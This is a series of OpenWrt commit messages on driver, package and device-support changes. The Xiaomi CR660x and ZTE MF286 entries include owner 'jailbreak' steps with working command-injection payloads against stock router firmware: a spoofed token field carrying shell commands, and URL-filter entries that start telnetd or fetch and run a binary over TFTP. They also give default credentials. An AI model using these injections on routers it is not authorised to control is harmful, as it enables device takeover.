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The 80211r r0kh and r1kh defaults are generated from the md5sum of
"$mobility_domain/$auth_secret". auth_secret is only set when using EAP
authentication, but the default key is used for SAE/PSK as well. In
this case, auth_secret is empty, and the default value of the key can
be computed from the SSID alone.
Fallback to using $key when auth_secret is empty. While at it, rename
the variable holding the generated key from 'key' to 'ft_key', to avoid
clobbering the PSK.
Signed-off-by: Eneas U de Queiroz <cotequeiroz@gmail.com>
[make ft_key local]
Signed-off-by: David Bauer <mail@david-bauer.net>
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Add the STAs extended capabilities to the ubus STA information. This
way, external daemons can be made aware of a STAs capabilities.
This field is of an array type and contains 0 or more bytes of a STAs
advertised extended capabilities.
Signed-off-by: David Bauer <mail@david-bauer.net>
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This patch adds support for creation heartbeat led trigger with,
for example, this command:
ucidef_set_led_heartbeat "..." "..." "..."
from /etc/board.d/01_leds.
Signed-off-by: Alexey Smirnov <s.alexey@gmail.com>
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This module was used solely by Buffalo WZR-HP-G300NH devices
and has become obsolete with the introduction of gpio-cascade.
Signed-off-by: Mauri Sandberg <maukka@ext.kapsi.fi>
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Adds kernel module for Generic GPIO cascade.
Signed-off-by: Mauri Sandberg <maukka@ext.kapsi.fi>
Signed-off-by: Petr Štetiar <ynezz@true.cz> [missing commit description]
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Adds new kernel module for GPIO controlled multiplexer support.
Signed-off-by: Mauri Sandberg <maukka@ext.kapsi.fi>
Signed-off-by: Petr Štetiar <ynezz@true.cz> [missing commit description]
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a87d010 uxc: remove unused printf parameter
ad65249 instance: exit in case asprintf() fails
Build with glibc should again work after this commit.
Fixes: e9e61d76fd ("procd: update to git HEAD")
Signed-off-by: Daniel Golle <daniel@makrotopia.org>
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df1123e uxc: add support for user-defined settings
0272c7c uxc: allow editing settings using 'create'
a839518 uxc: clean up error handling
Signed-off-by: Daniel Golle <daniel@makrotopia.org>
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For sysupgrade on NAND/UBI devices there is the U-Boot environment
variable rootfs_data_max which can be used to limit the size of the
rootfs_data volume created on sysupgrade.
This stopped working reliable with recent kernels, probably due to a
race condition when reading the number of free erase blocks from sysfs
just after removing a volume.
Change the script to just try creating rootfs_data with the desired
size and retry with maximum size in case that fails. Hence calculating
the available size in the script can be dropped which works around the
problem.
Signed-off-by: Daniel Golle <daniel@makrotopia.org>
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Signed-off-by: Stijn Tintel <stijn@linux-ipv6.be>
Acked-by: Jo-Philipp Wich <jo@mein.io>
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ddd3c2f38b30 mt76: redefine mt76_for_each_q_rx to adapt mt7986 changes
7fa5229a4228 mt76: improve signal strength reporting
025a72cd2d24 mt76: mt7915: fix injected MPDU transmission to not use HW A-MSDU
8c765fd92d97 mt76: mt7615: introduce SAR support
799a15bb68f9 mt76: fix endianness errors in reverse_frag0_hdr_trans
c114919f0c08 mt76: mt7915: Fix channel state update error issue
93191a37e59a mt76: mt7915: fix potential memory leak of fw monitor packets
cde589b2efb7 mt76: mt7921s: fix missing fc type/sub-type for 802.11 pkts
6ef22f4dc4e4 mt76: mt7915: add support for MT7986
7f1818cd8f2d mt76: mt7915: introduce band_idx in mt7915_phy
1d57a0d506db mt76: mt7915: initialize smps mode in mt7915_mcu_sta_rate_ctrl_tlv()
1f2a4816a3de mt76: mt7615: fix compiler warning on frame size
d60f335e785b mt76: mt7915: fix endianness warnings in mt7915_debugfs_rx_fw_monitor
d0ab636cb61c mt76: mt7915: fix endianness warnings in mt7915_mac_tx_free()
9d9bd7b3c48c mt76: connac: adjust wlan_idx size from u8 to u16
be1091f1172d mt76: mt7615: Fix assigning negative values to unsigned variable
d4fc42889a30 mt76: mt7915: check band idx for bcc event
98ee3e2889ea mt76: mt7915: fix logic error and remove the unused member of mt7915_dev
bbbbafb67bac mt76: mt7915: fix compiler warning
abd80cf68db1 mt76: mt7915: fix the muru tlv issue
a050c14b5631 mt76: mt7915: use min_t() to make code cleaner
9fee8f3736eb mt76: mt7915e: Fix degraded performance after temporary overheat
f2e1a62cf0d0 mt76: mt7915e: Add a hwmon attribute to get the actual throttle state.
c67df0d3130a mt76: mt7915e: Enable thermal management by default
Signed-off-by: Felix Fietkau <nbd@nbd.name>
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Signed-off-by: Felix Fietkau <nbd@nbd.name>
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'uxc boot' is inteded to be called multiple times, so there is not need
to guard the first call on boot -- the actual code anyway didn't do
that, so just remove it.
Signed-off-by: Daniel Golle <daniel@makrotopia.org>
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This fixes the following security problem:
The command-line argument parser in tcpdump before 4.99.0 has a buffer
overflow in tcpdump.c:read_infile(). To trigger this vulnerability the
attacker needs to create a 4GB file on the local filesystem and to
specify the file name as the value of the -F command-line argument of
tcpdump.
Signed-off-by: Hauke Mehrtens <hauke@hauke-m.de>
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Signed-off-by: Felix Fietkau <nbd@nbd.name>
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53caa1a fw4: resolve zone layer 2 devices for hw flow offloading
9fe58f5 fw4: rework and fix family inheritance logic
8795296 tests: mocklib: fix infinite recursion in wrapped print()
281b1bc tests: change mocked wan interface type to PPPoE
93b710d tests: mocklib: forward compatibility change
1a94915 fw4: only stage reflection rules if all required addrs are known
5c21714 fw4: add device iifname/oifname matches to DSCP and MARK rules
3eacc97 tests: adjust 01_ruleset test case to latest changes
Signed-off-by: Jo-Philipp Wich <jo@mein.io>
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a29bad9 compiler: fix patchlist corruption on switch statement syntax errors
86f0662 lib: change `ord()` to always return single byte value
116a8ce vallist: fix storing/retrieving short strings with 8bit byte value
Signed-off-by: Jo-Philipp Wich <jo@mein.io>
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e230e71e0a12 map: fix copy-paste error in codepoints map
580d2ccf89f3 bpf: declare tcp_ports/udp_ports without typedef
8d6c19a81f3f ubus: fix a use-after-free bug
Signed-off-by: Felix Fietkau <nbd@nbd.name>
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a317c17 compiler: fix incorrect loop break targets
Signed-off-by: Jo-Philipp Wich <jo@mein.io>
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When the uci configuration is created automatically during a very early
stage, where no entropy daemon is set up, generating the key directly is
not an option. Therefore we allow to set the private_key to "generate"
and generate the private key directly before the interface is taken up.
Signed-off-by: Leonardo Mörlein <me@irrelefant.net>
Tested-by: Jan-Niklas Burfeind <git@aiyionpri.me>
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Refresh patches after updating to hostapd v2.10.
Signed-off-by: David Bauer <mail@david-bauer.net>
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Upstreamed patches:
020-mesh-make-forwarding-configurable.patch
e6db1bc5da3fd7d5f4dba24aa102543b4749912f
550-WNM-allow-specifying-dialog-token.patch
979f19716539362f8ce60a77bf1b88fdcf5ba8e5
720-ACS-fix-channel-100-frequency.patch
2341585c349231af00cdef8d51458df01bc6965f
741-proxyarp-fix-compilation-with-Hotspot-2.0-disabled.patch
08bdf4f90de61a84ed8f4dd918272dd9d36e2e1f
Compile-tested: wpad-wolfssl hostapd-openssl
Run-tested: ath79-generic
Signed-off-by: David Bauer <mail@david-bauer.net>
Tested-by: Stijn Tintel <stijn@linux-ipv6.be>
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a0518b6 fw4: gracefully handle unsupported hardware offloading
ac99eba init: fix boot action in init script
Signed-off-by: Jo-Philipp Wich <jo@mein.io>
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Simplifies switching to different channels when on >= VHT80
Signed-off-by: Felix Fietkau <nbd@nbd.name>
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909f2a0 ucode: adjust to latest ucode api
4c532bf ucode: add ucode interpreter plugin
9c6ba38 treewide: adjust ubus object type names
75a96dc build: honour CMake install prefix in hardcoded paths
Signed-off-by: Jo-Philipp Wich <jo@mein.io>
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2f8b136 main: fix leaking -p/-s argument values
881fd3b ucode: adjust to latest ucode api
8b2868e file: specify UTF-8 as charset for dirlists, add option to override
3a5bd84 main: add ucode options to help text
16aa142 examples: add ucode handler example
3ceccd0 ucode: add ucode plugin support
f0f1406 examples: add example Lua handler script
9e87095 listen: avoid invalid memory access
Signed-off-by: Jo-Philipp Wich <jo@mein.io>
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b54f462 fw4: parse traffic rules before forwarding rules
4d5af8b fw4: consolidate helper code
300c737 fw4: fix applying zone family restrictions to forwardings
eb9c25a tests: implement fs.opendir() mock interface
d30ff48 tests: fix mocked fs.popen() trace log
52831a0 fw4: improve flowtable handling
7cb10c8 fw4: disable "flow_offloading_hw" option for now
b2241a1 fw4: fix enabling NAT reflection rules for DNATs without explicit family
Signed-off-by: Jo-Philipp Wich <jo@mein.io>
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11adf0c source: convert source objects into proper uc_value_t type
3a49192 treewide: rework function memory model
7edad5c tests: add functional tests for builtin functions
d5003fd lib: fix leaking tokener in uc_json() on parse exception
5d0ecd9 lib: fix infinite loop on empty regexp matches in uc_replace()
3ad57f1 lib: fix infinite loop on empty regexp matches in uc_match()
32d596d lib: fix infinite loop on empty regexp matches in uc_split()
3e3f38d vm: ensure consistent trace output between gcc and clang compiled ucode
3600ded vm: fix leaking function value on call exception
3059295 vm: NULL-initialize pointer to make cppcheck happy
98e59bf source: zero-initialize conversion union to make cppcheck happy
7a65c14 run_tests.sh: change workdir to testcase directory during execution
afec8d7 run_tests.sh: support placing supplemental testcase files
3ada6e0 run_tests.sh: always treat outputs as text data
2cb627f program: rename bytecode load/write functions, track path of executed file
1094ffa lib: fix memory leak in uc_require_ucode()
Signed-off-by: Jo-Philipp Wich <jo@mein.io>
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fd4c9e1 system-linux: expose hw-tc-offload ethtool feature in device status dump
3d76f2e system-linux: add wrapper function for creating link config messages
88af2f1 system-linux: delete bridge devices using netlink
85c3548 system-linux: create bridge devices using netlink
Signed-off-by: Jo-Philipp Wich <jo@mein.io>
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Xiaomi Mi Router CR6606 is a Wi-Fi6 AX1800 Router with 4 GbE Ports.
Alongside the general model, it has three carrier customized models:
CR6606 (China Unicom), CR6608 (China Mobile), CR6609 (China Telecom)
Specifications:
- SoC: MediaTek MT7621AT
- RAM: 256MB DDR3 (ESMT M15T2G16128A)
- Flash: 128MB NAND (ESMT F59L1G81MB)
- Ethernet: 1000Base-T x4 (MT7530 SoC)
- WLAN: 2x2 2.4GHz 574Mbps + 2x2 5GHz 1201Mbps (MT7905DAN + MT7975DN)
- LEDs: System (Blue, Yellow), Internet (Blue, Yellow)
- Buttons: Reset, WPS
- UART: through-hole on PCB ([VCC 3.3v](RX)(GND)(TX) 115200, 8n1)
- Power: 12VDC, 1A
Jailbreak Notes:
1. Get shell access.
1.1. Get yourself a wireless router that runs OpenWrt already.
1.2. On the OpenWrt router:
1.2.1. Access its console.
1.2.2. Create and edit
/usr/lib/lua/luci/controller/admin/xqsystem.lua
with the following code (exclude backquotes and line no.):
```
1 module("luci.controller.admin.xqsystem", package.seeall)
2
3 function index()
4 local page = node("api")
5 page.target = firstchild()
6 page.title = ("")
7 page.order = 100
8 page.index = true
9 page = node("api","xqsystem")
10 page.target = firstchild()
11 page.title = ("")
12 page.order = 100
13 page.index = true
14 entry({"api", "xqsystem", "token"}, call("getToken"), (""),
103, 0x08)
15 end
16
17 local LuciHttp = require("luci.http")
18
19 function getToken()
20 local result = {}
21 result["code"] = 0
22 result["token"] = "; nvram set ssh_en=1; nvram commit; sed -i
's/channel=.*/channel=\"debug\"/g' /etc/init.d/dropbear; /etc/init.d/drop
bear start;"
23 LuciHttp.write_json(result)
24 end
```
1.2.3. Browse http://{OWRT_ADDR}/cgi-bin/luci/api/xqsystem/token
It should give you a respond like this:
{"code":0,"token":"; nvram set ssh_en=1; nvram commit; ..."}
If so, continue; Otherwise, check the file, reboot the rout-
er, try again.
1.2.4. Set wireless network interface's IP to 169.254.31.1, turn
off DHCP of wireless interface's zone.
1.2.5. Connect to the router wirelessly, manually set your access
device's IP to 169.254.31.3, make sure
http://169.254.31.1/cgi-bin/luci/api/xqsystem/token
still have a similar result as 1.2.3 shows.
1.3. On the Xiaomi CR660x:
1.3.1. Login to the web interface. Your would be directed to a
page with URL like this:
http://{ROUTER_ADDR}/cgi-bin/luci/;stok={STOK}/web/home#r-
outer
1.3.2. Browse this URL with {STOK} from 1.3.1, {WIFI_NAME}
{PASSWORD} be your OpenWrt router's SSID and password:
http://{MIROUTER_ADDR}/cgi-bin/luci/;stok={STOK}/api/misy-
stem/extendwifi_connect?ssid={WIFI_NAME}&password={PASSWO-
RD}
It should return 0.
1.3.3. Browse this URL with {STOK} from 1.3.1:
http://{MIROUTER_ADDR}/cgi-bin/luci/;stok={STOK}/api/xqsy-
stem/oneclick_get_remote_token?username=xxx&password=xxx&-
nonce=xxx
1.4. Before rebooting, you can now access your CR660x via SSH.
For CR6606, you can calculate your root password by this project:
https://github.com/wfjsw/xiaoqiang-root-password, or at
https://www.oxygen7.cn/miwifi.
The root password for carrier-specific models should be the admi-
nistration password or the default login password on the label.
It is also feasible to change the root password at the same time
by modifying the script from step 1.2.2.
You can treat OpenWrt Router however you like from this point as
long as you don't mind go through this again if you have to expl-
oit it again. If you do have to and left your OpenWrt router unt-
ouched, start from 1.3.
2. There's no official binary firmware available, and if you lose the
content of your flash, no one except Xiaomi can help you.
Dump these partitions in case you need them:
"Bootloader" "Nvram" "Bdata" "crash" "crash_log"
"firmware" "firmware1" "overlay" "obr"
Find the corespond block device from /proc/mtd
Read from read-only block device to avoid misoperation.
It's recommended to use /tmp/syslogbackup/ as destination, since files
would be available at http://{ROUTER_ADDR}/backup/log/YOUR_DUMP
Keep an eye on memory usage though.
3. Since UART access is locked ootb, you should get UART access by modify
uboot env. Otherwise, your router may become bricked.
Excute these in stock firmware shell:
a. nvram set boot_wait=on
b. nvram set bootdelay=3
c. nvram commit
Or in OpenWrt:
a. opkg update && opkg install kmod-mtd-rw
b. insmod mtd-rw i_want_a_brick=1
c. fw_setenv boot_wait on
d. fw_setenv bootdelay 3
e. rmmod mtd-rw
Migrate to OpenWrt:
1. Transfer squashfs-firmware.bin to the router.
2. nvram set flag_try_sys1_failed=0
3. nvram set flag_try_sys2_failed=1
4. nvram commit
5. mtd -r write /path/to/image/squashfs-firmware.bin firmware
Additional Info:
1. CR660x series routers has a different nand layout compared to other
Xiaomi nand devices.
2. This router has a relatively fresh uboot (2018.09) compared to other
Xiaomi devices, and it is capable of booting fit image firmware.
Unfortunately, no successful attempt of booting OpenWrt fit image
were made so far. The cause is still yet to be known. For now, we use
legacy image instead.
Signed-off-by: Raymond Wang <infiwang@pm.me>
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Hardware
--------
SoC: QCN5502
Flash: 16 MiB
RAM: 128 MiB
Ethernet: 1 gigabit port
Wireless No1: QCN5502 on-chip 2.4GHz 4x4
Wireless No2: QCA9984 pcie 5GHz 4x4
USB: none
Installation
------------
Flash the factory image using the stock web interface or TFTP the
factory image to the bootloader.
What works
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- LEDs
- Ethernet port
- 5GHz wifi (QCA9984 pcie)
What doesn't work
-----------------
- 2.4GHz wifi (QCN5502 on-chip)
(I was not able to make this work, probably because ath9k requires
some changes to support QCN5502.)
Signed-off-by: Wenli Looi <wlooi@ucalgary.ca>
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fgrep is deprecated and replaced by grep -F. The latter is used
throughout the tree whereas this is the only usage of the former.
Signed-off-by: Rosen Penev <rosenp@gmail.com>
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Now that we have separate files for each kernel version,
only the version/hash for the target kernel are available.
This cause a missing hash error (and wrong kernel version) for
bpf-headers when a testing kernel version is used for the current target.
Fix this error by manually including the kernel version/hash file for the
specific kernel version requested.
Signed-off-by: Ansuel Smith <ansuelsmth@gmail.com>
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Add a package for util-linux' ipcs command, to show information about
System V inter-process communication facilities.
Signed-off-by: Stijn Tintel <stijn@linux-ipv6.be>
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ZTE MF286 is an indoor LTE category 6 CPE router with simultaneous
dual-band 802.11ac plus 802.11n Wi-Fi radios and quad-port gigabit
Ethernet switch, FXS and external USB 2.0 port.
Hardware highlights:
- CPU: QCA9563 SoC at 775MHz,
- RAM: 128MB DDR2,
- NOR Flash: MX25L1606E 2MB SPI Flash, for U-boot only,
- NAND Flash: GD5F1G04UBYIG 128MB SPI NAND-Flash, for all other data,
- Wi-Fi 5GHz: QCA9882 2x2 MIMO 802.11ac radio,
- WI-Fi 2.4GHz: QCA9563 3x3 MIMO 802.11n radio,
- Switch: QCA8337v2 4-port gigabit Ethernet, with single SGMII CPU port,
- WWAN: MDM9230-based category 6 internal LTE modem in extended
mini-PCIE form factor, with 3 internal antennas and 2 external antenna
connections, single mini-SIM slot. Modem model identified as MF270,
- FXS: one external ATA port (handled entirely by modem part) with two
physical connections in parallel,
- USB: Single external USB 2.0 port,
- Switches: power switch, WPS, Wi-Fi and reset buttons,
- LEDs: Wi-Fi, Test (internal). Rest of LEDs (Phone, WWAN, Battery,
Signal state) handled entirely by modem. 4 link status LEDs handled by
the switch on the backside.
- Battery: 3Ah 1-cell Li-Ion replaceable battery, with charging and
monitoring handled by modem.
- Label MAC device: eth0
Console connection: connector X2 is the console port, with the following
pinout, starting from pin 1, which is the topmost pin when the board is
upright:
- VCC (3.3V). Do not use unless you need to source power for the
converer from it.
- TX
- RX
- GND
Default port configuration in U-boot as well as in stock firmware is
115200-8-N-1.
Installation:
Due to different flash layout from stock firmware, sysupgrade from
within stock firmware is impossible, despite it's based on QSDK which
itself is based on OpenWrt.
STEP 0: Stock firmware update:
As installing OpenWrt cuts you off from official firmware updates for
the modem part, it is recommended to update the stock firmware to latest
version before installation, to have built-in modem at the latest firmware
version.
STEP 1: gaining root shell:
Method 1:
This works if busybox has telnetd compiled in the binary.
If this does not work, try method 2.
Using well-known exploit to start telnetd on your router - works
only if Busybox on stock firmware has telnetd included:
- Open stock firmware web interface
- Navigate to "URL filtering" section by going to "Advanced settings",
then "Firewall" and finally "URL filter".
- Add an entry ending with "&&telnetd&&", for example
"http://hostname/&&telnetd&&".
- telnetd will immediately listen on port 4719.
- After connecting to telnetd use "admin/admin" as credentials.
Method 2:
This works if busybox does not have telnetd compiled in. Notably, this
is the case in DNA.fi firmware.
If this does not work, try method 3.
- Set IP of your computer to 192.168.1.22.
- Have a TFTP server running at that address
- Download MIPS build of busybox including telnetd, for example from:
https://busybox.net/downloads/binaries/1.21.1/busybox-mips
and put it in it's root directory. Rename it as "telnetd".
- As previously, login to router's web UI and navigate to "URL
filtering"
- Using "Inspect" feature, extend "maxlength" property of the input
field named "addURLFilter", so it looks like this:
<input type="text" name="addURLFilter" id="addURLFilter" maxlength="332"
class="required form-control">
- Stay on the page - do not navigate anywhere
- Enter "http://aa&zte_debug.sh 192.168.1.22 telnetd" as a filter.
- Save the settings. This will download the telnetd binary over tftp and
execute it. You should be able to log in at port 23, using
"admin/admin" as credentials.
Method 3:
If the above doesn't work, use the serial console - it exposes root shell
directly without need for login. Some stock firmwares, notably one from
finnish DNA operator lack telnetd in their builds.
STEP 2: Backing up original software:
As the stock firmware may be customized by the carrier and is not
officially available in the Internet, IT IS IMPERATIVE to back up the
stock firmware, if you ever plan to returning to stock firmware.
Method 1: after booting OpenWrt initramfs image via TFTP:
PLEASE NOTE: YOU CANNOT DO THIS IF USING INTERMEDIATE FIRMWARE FOR INSTALLATION.
- Dump stock firmware located on stock kernel and ubi partitions:
ssh root@192.168.1.1: cat /dev/mtd4 > mtd4_kernel.bin
ssh root@192.168.1.1: cat /dev/mtd8 > mtd8_ubi.bin
And keep them in a safe place, should a restore be needed in future.
Method 2: using stock firmware:
- Connect an external USB drive formatted with FAT or ext4 to the USB
port.
- The drive will be auto-mounted to /var/usb_disk
- Check the flash layout of the device:
cat /proc/mtd
It should show the following:
mtd0: 00080000 00010000 "uboot"
mtd1: 00020000 00010000 "uboot-env"
mtd2: 00140000 00020000 "fota-flag"
mtd3: 00140000 00020000 "caldata"
mtd4: 00140000 00020000 "mac"
mtd5: 00600000 00020000 "cfg-param"
mtd6: 00140000 00020000 "oops"
mtd7: 00800000 00020000 "web"
mtd8: 00300000 00020000 "kernel"
mtd9: 01f00000 00020000 "rootfs"
mtd10: 01900000 00020000 "data"
mtd11: 03200000 00020000 "fota"
Differences might indicate that this is NOT a vanilla MF286 device but
one of its later derivatives.
- Copy over all MTD partitions, for example by executing the following:
for i in 0 1 2 3 4 5 6 7 8 9 10 11; do cat /dev/mtd$i > \
/var/usb_disk/mtd$i; done
- If the count of MTD partitions is different, this might indicate that
this is not a standard MF286 device, but one of its later derivatives.
- (optionally) rename the files according to MTD partition names from
/proc/mtd
- Unmount the filesystem:
umount /var/usb_disk; sync
and then remove the drive.
- Store the files in safe place if you ever plan to return to stock
firmware. This is especially important, because stock firmware for
this device is not available officially, and is usually customized by
the mobile providers.
STEP 3: Booting initramfs image:
Method 1: using serial console (RECOMMENDED):
- Have TFTP server running, exposing the OpenWrt initramfs image, and
set your computer's IP address as 192.168.1.22. This is the default
expected by U-boot. You may wish to change that, and alter later
commands accordingly.
- Connect the serial console if you haven't done so already,
- Interrupt boot sequence by pressing any key in U-boot when prompted
- Use the following commands to boot OpenWrt initramfs through TFTP:
setenv serverip 192.168.1.22
setenv ipaddr 192.168.1.1
tftpboot 0x81000000 openwrt-ath79-nand-zte_mf286-initramfs-kernel.bin
bootm 0x81000000
(Replace server IP and router IP as needed). There is no emergency
TFTP boot sequence triggered by buttons, contrary to MF283+.
- When OpenWrt initramfs finishes booting, proceed to actual
installation.
Method 2: using initramfs image as temporary boot kernel
This exploits the fact, that kernel and rootfs MTD devices are
consecutive on NAND flash, so from within stock image, an initramfs can
be written to this area and booted by U-boot on next reboot, because it
uses "nboot" command which isn't limited by kernel partition size.
- Download the initramfs-kernel.bin image
- Split the image into two parts on 3MB partition size boundary, which
is the size of kernel partition. Pad the output of second file to
eraseblock size:
dd if=openwrt-ath79-nand-zte_mf286-initramfs-kernel.bin \
bs=128k count=24 \
of=openwrt-ath79-zte_mf286-intermediate-kernel.bin
dd if=openwrt-ath79-nand-zte_mf286-initramfs-kernel.bin \
bs=128k skip=24 conv=sync \
of=openwrt-ath79-zte_mf286-intermediate-rootfs.bin
- Copy over /usr/bin/flash_eraseall and /usr/bin/nandwrite utilities to
/tmp. This is CRITICAL for installation, as erasing rootfs will cut
you off from those tools on flash!
- After backing up the previous MTD contents, write the images to the
respective MTD devices:
/tmp/flash_eraseall /dev/<kernel-mtd>
/tmp/nandwrite /dev/<kernel-mtd> \
/var/usb_disk/openwrt-ath79-zte_mf286-intermediate-kernel.bin
/tmp/flash_eraseall /dev/<kernel-mtd>
/tmp/nandwrite /dev/<rootfs-mtd> \
/var/usb_disk/openwrt-ath79-zte_mf286-intermediate-rootfs.bin
- Ensure that no bad blocks were present on the devices while writing.
If they were present, you may need to vary the split between
kernel and rootfs parts, so U-boot reads a valid uImage after skipping
the bad blocks. If it fails, you will be left with method 3 (below).
- If write is OK, reboot the device, it will reboot to OpenWrt
initramfs:
reboot -f
- After rebooting, SSH into the device and use sysupgrade to perform
proper installation.
Method 3: using built-in TFTP recovery (LAST RESORT):
- With that method, ensure you have complete backup of system's NAND
flash first. It involves deliberately erasing the kernel.
- Download "-initramfs-kernel.bin" image for the device.
- Prepare the recovery image by prepending 8MB of zeroes to the image,
and name it root_uImage:
dd if=/dev/zero of=padding.bin bs=8M count=1
cat padding.bin openwrt-ath79-nand-zte_mf286-initramfs-kernel.bin >
root_uImage
- Set up a TFTP server at 192.0.0.1/8. Router will use random address
from that range.
- Put the previously generated "root_uImage" into TFTP server root
directory.
- Deliberately erase "kernel" partition" using stock firmware after
taking backup. THIS IS POINT OF NO RETURN.
- Restart the device. U-boot will attempt flashing the recovery
initramfs image, which will let you perform actual installation using
sysupgrade. This might take a considerable time, sometimes the router
doesn't establish Ethernet link properly right after booting. Be
patient.
- After U-boot finishes flashing, the LEDs of switch ports will all
light up. At this moment, perform power-on reset, and wait for OpenWrt
initramfs to finish booting. Then proceed to actual installation.
STEP 4: Actual installation:
- scp the sysupgrade image to the device:
scp openwrt-ath79-nand-zte_mf286-squashfs-sysupgrade.bin \
root@192.168.1.1:/tmp/
- ssh into the device and execute sysupgrade:
sysupgrade -n /tmp/openwrt-ath79-nand-zte_mf286-squashfs-sysupgrade.bin
- Wait for router to reboot to full OpenWrt.
STEP 5: WAN connection establishment
Since the router is equipped with LTE modem as its main WAN interface, it
might be useful to connect to the Internet right away after
installation. To do so, please put the following entries in
/etc/config/network, replacing the specific configuration entries with
one needed for your ISP:
config interface 'wan'
option proto 'qmi'
option device '/dev/cdc-wdm0'
option auth '<auth>' # As required, usually 'none'
option pincode '<pin>' # If required by SIM
option apn '<apn>' # As required by ISP
option pdptype '<pdp>' # Typically 'ipv4', or 'ipv4v6' or 'ipv6'
For example, the following works for most polish ISPs
config interface 'wan'
option proto 'qmi'
option device '/dev/cdc-wdm0'
option auth 'none'
option apn 'internet'
option pdptype 'ipv4'
If you have build with LuCI, installing luci-proto-qmi helps with this
task.
Restoring the stock firmware:
Preparation:
If you took your backup using stock firmware, you will need to
reassemble the partitions into images to be restored onto the flash. The
layout might differ from ISP to ISP, this example is based on generic stock
firmware.
The only partitions you really care about are "web", "kernel", and
"rootfs". For easy padding and possibly restoring configuration, you can
concatenate most of them into images written into "ubi" meta-partition
in OpenWrt. To do so, execute something like:
cat mtd5_cfg-param.bin mtd6-oops.bin mtd7-web.bin mtd9-rootfs.bin > \
mtd8-ubi_restore.bin
You can skip the "fota" partition altogether,
it is used only for stock firmware update purposes and can be overwritten
safely anyway. The same is true for "data" partition which on my device
was found to be unused at all. Restoring mtd5_cfg-param.bin will restore
the stock firmware configuration you had before.
Method 1: Using initramfs:
- Boot to initramfs as in step 3:
- Completely detach ubi0 partition using ubidetach /dev/ubi0_0
- Look up the kernel and ubi partitions in /proc/mtd
- Copy over the stock kernel image using scp to /tmp
- Erase kernel and restore stock kernel:
(scp mtd4_kernel.bin root@192.168.1.1:/tmp/)
mtd write <kernel_mtd> mtd4_kernel.bin
rm mtd4_kernel.bin
- Copy over the stock partition backups one-by-one using scp to /tmp, and
restore them individually. Otherwise you might run out of space in
tmpfs:
(scp mtd3_ubiconcat0.bin root@192.168.1.1:/tmp/)
mtd write <ubiconcat0_mtd> mtd3_ubiconcat0.bin
rm mtd3_ubiconcat0.bin
(scp mtd5_ubiconcat1.bin root@192.168.1.1:/tmp/)
mtd write <ubiconcat1_mtd> mtd5_ubiconcat1.bin
rm mtd5_ubiconcat1.bin
- If the write was correct, force a device reboot with
reboot -f
Method 2: Using live OpenWrt system (NOT RECOMMENDED):
- Prepare a USB flash drive contatining MTD backup files
- Ensure you have kmod-usb-storage and filesystem driver installed for
your drive
- Mount your flash drive
mkdir /tmp/usb
mount /dev/sda1 /tmp/usb
- Remount your UBI volume at /overlay to R/O
mount -o remount,ro /overlay
- Write back the kernel and ubi partitions from USB drive
cd /tmp/usb
mtd write mtd4_kernel.bin /dev/<kernel_mtd>
mtd write mtd8_ubi.bin /dev/<kernel_ubi>
- If everything went well, force a device reboot with
reboot -f
Last image may be truncated a bit due to lack of space in RAM, but this will happen over "fota"
MTD partition which may be safely erased after reboot anyway.
Method 3: using built-in TFTP recovery (LAST RESORT):
- Assemble a recovery rootfs image from backup of stock partitions by
concatenating "web", "kernel", "rootfs" images dumped from the device,
as "root_uImage"
- Use it in place of "root_uImage" recovery initramfs image as in the
TFTP pre-installation method.
Quirks and known issues
- Kernel partition size is increased to 4MB compared to stock 3MB, to
accomodate future kernel updates - at this moment OpenWrt 5.10 kernel
image is at 2.5MB which is dangerously close to the limit. This has no
effect on booting the system - but keep that in mind when reassembling
an image to restore stock firmware.
- uqmi seems to be unable to change APN manually, so please use the one
you used before in stock firmware first. If you need to change it,
please use protocok '3g' to establish connection once, or use the
following command to change APN (and optionally IP type) manually:
echo -ne 'AT+CGDCONT=1,"IP","<apn>' > /dev/ttyUSB0
- The only usable LED as a "system LED" is the green debug LED hidden
inside the case. All other LEDs are controlled by modem, on which the
router part has some influence only on Wi-Fi LED.
- Wi-Fi LED currently doesn't work while under OpenWrt, despite having
correct GPIO mapping. All other LEDs are controlled by modem,
including this one in stock firmware. GPIO19, mapped there only acts
as a gate, while the actual signal source seems to be 5GHz Wi-Fi
radio, however it seems it is not the LED exposed by ath10k as
ath10k-phy0.
- GPIO5 used for modem reset is a suicide switch, causing a hardware
reset of whole board, not only the modem. It is attached to
gpio-restart driver, to restart the modem on reboot as well, to ensure
QMI connectivity after reboot, which tends to fail otherwise.
- Modem, as in MF283+, exposes root shell over ADB - while not needed
for OpenWrt operation at all - have fun lurking around.
- MAC address shift for 5GHz Wi-Fi used in stock firmware is
0x320000000000, which is impossible to encode in the device tree, so I
took the liberty of using MAC address increment of 1 for it, to ensure
different BSSID for both Wi-Fi interfaces.
Signed-off-by: Lech Perczak <lech.perczak@gmail.com>
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ZTE MF286D is a LTE router with four gigabit ethernet ports
and integrated QMI mPCIE modem.
Hardware specification:
- CPU: IPQ4019
- RAM: 256MB
- Flash: NAND 128MB + NOR 2MB
- WLAN1: Qualcomm Atheros QCA4019 2.4GHz 802.11bgn 2x2:2
- WLAN2: Qualcomm Atheros QCA4019 5GHz 802.11anac 2x2:2
- LTE: mPCIe cat 12 card (Modem chipset MDM9250)
- LAN: 4 Gigabit Ports
- USB: 1x USB2.0 (regular port). 1x USB3.0 (mpcie - used by the modem)
- Serial console: X8 connector 115200 8n1
Known issues:
- Many LEDs are driven by the modem. Only internal LEDs and wifi LEDs
are driven by cpu.
- Wifi LED is triggered by phy0tpt only
- No VoIP support
- LAN1/WAN port is configured as WAN
- ZTE gives only one MAC per device. Use +1/+2/+3 increment for WAN
and WLAN0/1
Opening the case:
1. Take of battery lid (no battery support for this model, battery cage
is dummy).
2. Unscrew screw placed behind battery lid.
3. Take off back cover. It attached with multiple plastic clamps.
4. Unscrew four more screws hidden behind back case.
5. Remove front panel from blue chassis. There are more plastic
clamps.
6. Unscrew two boards, which secures the PCB in the chassis.
7. Extract board from blue chassis.
Console connection (X8 connector):
1. Parameters: 115200 8N1
2. Pin description: (from closest pin to X8 descriptor to farthest)
- VCC (3.3V)
- TX
- RX
- GND
Install Instructions:
Serial + initramfs:
1. Place OpenWrt initramfs image for the device on a TFTP in
the server's root. This example uses Server IP: 192.168.1.3
2. Connect serial console (115200,8n1) to X8 connector.
3. Connect TFTP server to RJ-45 port.
4. Stop in u-Boot and run u-Boot commands:
setenv serverip 192.168.1.3
setenv ipaddr 192.168.1.72
set fdt_high 0x85000000
tftp openwrt-ipq40xx-generic-zte_mf286d-initramfs-fit-zImage.itb
bootm $loadaddr
